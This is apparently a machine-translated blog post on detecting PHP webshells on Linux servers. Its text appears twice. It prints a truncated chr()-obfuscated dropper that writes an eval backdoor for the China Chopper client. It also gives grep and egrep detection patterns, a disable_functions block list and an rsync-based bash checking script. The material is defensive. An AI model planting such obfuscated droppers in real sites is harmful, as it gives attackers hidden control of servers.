linux webshellの検索
2925 ワード
まず馬を知って、普通の馬は暴露しやすくて、ハッカーはすべて手を残して、馬を正常なPHPファイルの中に入れます
//パスワードはaで、中国包丁で接続します
隠れた馬
fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40). ...省略
復号:chr括弧の中の数字はアメリカの情報交換の標準コードで、略語:ASCIIは1部の対照表を探して対応することができます
例えば46は.47は/32はスペースです
echo chr(46)で解くこともできます
WINDOWSの下には多くのログ分析や検索ツール(例えばD盾など)があるはずですが、LINUXの下ではどうやってWEBSHELLを検索しますか?
馬さんだけ調べてもいいです.
防犯:
危険関数の無効化、権限の整理、権限の過大化の防止
https://github.com/emposha/PHP-Shell-Detector
gitを降りるには2つのファイルしか必要ありません.php//デフォルトアカウントパスワードadmin protect shelldetect.db
何かいいアドバイスがあれば、共有してくれてありがとう:)
20130826更新
馬さんは変種が多く、私たちの検査を迂回することが多いので、この時、書類を比較したほうがいいです.
例えば、ネットで探していたこのPHPの一言
以下は自分で書いた比較的簡単なチェックスクリプトを提供し、ディレクトリに更新されたPHPファイルを比較してマッチングすることを考えています.
拡張読書:
shellバウンス
php-security-best-practices-tutorial
十大PHPベスト安全実践
PHPをsuhosinで保護する
//パスワードはaで、中国包丁で接続します
隠れた馬
fputs(fopen(chr(46).chr(47).chr(97).chr(46).chr(112).chr(104).chr(112),w),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40). ...省略
復号:chr括弧の中の数字はアメリカの情報交換の標準コードで、略語:ASCIIは1部の対照表を探して対応することができます
例えば46は.47は/32はスペースです
echo chr(46)で解くこともできます
WINDOWSの下には多くのログ分析や検索ツール(例えばD盾など)があるはずですが、LINUXの下ではどうやってWEBSHELLを検索しますか?
find /www/ -name "*.php" |xargs egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval \(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode'馬さんだけ調べてもいいです.
grep -r --include=*.php '[^a-z]eval($_POST' . > post.txt
grep -r --include=*.php '[^a-z]eval($_REQUEST' . > REQUEST.txt防犯:
危険関数の無効化、権限の整理、権限の過大化の防止
disable_functions = exec,scandir,shell_exec,phpinfo,eval,passthru,system,chroot,chgrp,chown,proc_open,proc_get_status,ini_alter,ini_restore,dl,openlog,syslog,readlink,s
ymlink,popepassthru,stream_socket_server,fsockethttps://github.com/emposha/PHP-Shell-Detector
gitを降りるには2つのファイルしか必要ありません.php//デフォルトアカウントパスワードadmin protect shelldetect.db
何かいいアドバイスがあれば、共有してくれてありがとう:)
20130826更新
馬さんは変種が多く、私たちの検査を迂回することが多いので、この時、書類を比較したほうがいいです.
例えば、ネットで探していたこのPHPの一言
以下は自分で書いた比較的簡単なチェックスクリプトを提供し、ディレクトリに更新されたPHPファイルを比較してマッチングすることを考えています.
#!/bin/bash
# RSYNC ,
Date=`date +%Y%m%d_%H:%M`
src=/www/www.a.com/
dest=/www/www.a.com.bk/
log_tmp1=/root/sh/webshell_php.log
log_result=/root/sh/webshell_result.log
which egrep
if [ $? -ne 0 ];then
echo "Not Found egrep,exit"
exit 0
fi
rsync -av --include="*/" --include="*.php" --exclude="*" $src $dest|grep -i php > $log_tmp1
for diff in `cat $log_tmp1`
do
egrep 'assert|phpspy|c99sh|milw0rm|eval|\(gunerpress|\(base64_decoolcode|spider_bc|shell_exec|passthru|\(\$\_\POST\[|eval \(str_rot13|\.chr\(|\$\{\"\_P|eval\(\$\_R|file_put_contents\(\.\*\$\_|base64_decode|\@preg_replace' "$dest""$diff"
if [ $? -eq 0 ];then
echo "===========================" >> $log_result
echo "$Date" >> $log_result
echo "$dest$diff is Dangerous" >> $log_result
fi
done拡張読書:
shellバウンス
php-security-best-practices-tutorial
十大PHPベスト安全実践
PHPをsuhosinで保護する